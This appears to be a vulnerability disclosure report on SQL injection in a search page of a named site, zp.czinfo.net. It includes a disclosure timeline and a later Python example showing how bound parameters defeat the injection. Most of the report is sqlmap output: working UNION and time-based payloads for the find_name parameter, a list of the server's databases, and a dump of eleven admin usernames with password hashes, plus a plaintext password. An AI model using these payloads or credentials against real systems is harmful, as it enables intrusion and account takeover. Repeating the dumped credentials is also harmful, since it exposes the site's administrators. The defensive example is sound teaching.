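2014-10-13: Details reported to the vendor; awaiting vendor response
2014-10-17: Vendor confirmed; details disclosed to the vendor only
2014-10-27: Details disclosed to core white hats and experts in related fields
2014-11-06: Details disclosed to regular white hats
2014-11-16: Details disclosed to intern white hats
2014-11-27: Details disclosed to the public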
Vulnerable page: http://zp.czinfo.net/chaxun.asp
POST parameters: button=88952634&find_name=88952634
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: find_name
    Type: UNION query
    Title: Generic UNION query (NULL) - 13 columns
    Payload: button=88952634&find_name=88952634' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(106)+CHAR(117)+CHAR(112)+CHAR(113)+CHAR(115)+CHAR(99)+CHAR(72)+CHAR(121)+CHAR(88)+CHAR(118)+CHAR(119)+CHAR(121)+CHAR(117)+CHAR(104)+CHAR(113)+CHAR(101)+CHAR(117)+CHAR(107)+CHAR(113),NULL,NULL,NULL,NULL,NULL--

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: button=88952634&find_name=88952634'; WAITFOR DELAY '0:0:5'--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: button=88952634&find_name=88952634' WAITFOR DELAY '0:0:5'--
---
[23:06:17] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
[23:06:17] [INFO] fetching database names
available databases [9]:
[*] 189_mail
[*] birth_db
[*] black_db
[*] master
[*] model
[*] msdb
[*] speed_2013
[*] tel_job
[*] tempdb

Database: tel_job
Table: ManageUser
[8 columns]
+---------------+---------------+
| Column        | Type          |
+---------------+---------------+
| ActiveState   | smallint      |
| LoginDatetime | smalldatetime |
| LoginIP       | nvarchar      |
| password      | nvarchar      |
| realname      | nvarchar      |
| Rowid         | int           |
| userlevel     | nvarchar      |
| username      | nvarchar      |
+---------------+---------------+

Database: tel_job
Table: ManageUser
[11 entries]
+----------+------------------+
| username | password         |
+----------+------------------+
| dong     | 69988207ff4d9722 |
| czdx     | 75cef11283fa85db |
| czdxxb   | a7a60da25bd19d0c |
| czdxcz   | 49ba59abbe56e057 |
| czdxwj   | 49ba59abbe56e057 |
| czdxgk   | 49ba59abbe56e057 |
| czdxkf   | 83cfe9d51ab31e4c |
| czdxhb   | 49ba59abbe56e057 |
| czdxkd   | 49ba59abbe56e057 |
| czwy     | 49ba59abbe56e057 |
| czdxxy   | 49ba59abbe56e057 |
+----------+------------------+
Weak passwords, all of them.
dong dong!^#
Other passwords: 123456
Filter the parameters.
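
An added example, not code from the original report or the affected site: it contrasts a concatenated query with a validated, bound-parameter query for a find_name-style lookup, which goes one step beyond filtering by keeping the value out of the SQL text entirely. The SQLite table, its columns, the sample rows and the function names are assumptions made for illustration; the reported application runs ASP against SQL Server, where the equivalent fix is a parameterized command.

```python
import sqlite3


def make_db():
    """Build an in-memory stand-in for the lookup table (constructed data)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE applicants (id INTEGER, name TEXT, phone TEXT)")
    db.executemany(
        "INSERT INTO applicants VALUES (?, ?, ?)",
        [(1, "88952634", "555-0100"), (2, "alice", "555-0101")],
    )
    return db


def lookup_concat(db, find_name):
    """'Before': the POST value is pasted into the SQL text, so a quote ends the literal."""
    sql = "SELECT id, name, phone FROM applicants WHERE name = '" + find_name + "'"
    return db.execute(sql).fetchall()


def lookup_bound(db, find_name):
    """'After': validate the value, then bind it so it can only ever be data."""
    if not isinstance(find_name, str) or not 0 < len(find_name) <= 64:
        raise ValueError("find_name must be 1-64 characters")
    sql = "SELECT id, name, phone FROM applicants WHERE name = ?"
    return db.execute(sql, (find_name,)).fetchall()


# Constructed probe in the same shape as the UNION payload in the report,
# cut down to this table's three columns.
PROBE = "88952634' UNION ALL SELECT NULL,NULL,'marker'--"

if __name__ == "__main__":
    db = make_db()
    print("concat, normal:", lookup_concat(db, "88952634"))
    print("concat, probe :", lookup_concat(db, PROBE))   # extra 'marker' row appears
    print("bound,  normal:", lookup_bound(db, "88952634"))
    print("bound,  probe :", lookup_bound(db, PROBE))    # no rows: probe is just a name
```
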
Severity: Medium
Vulnerability Rank: 9
Confirmed at: 2014-10-17 15:27
None yet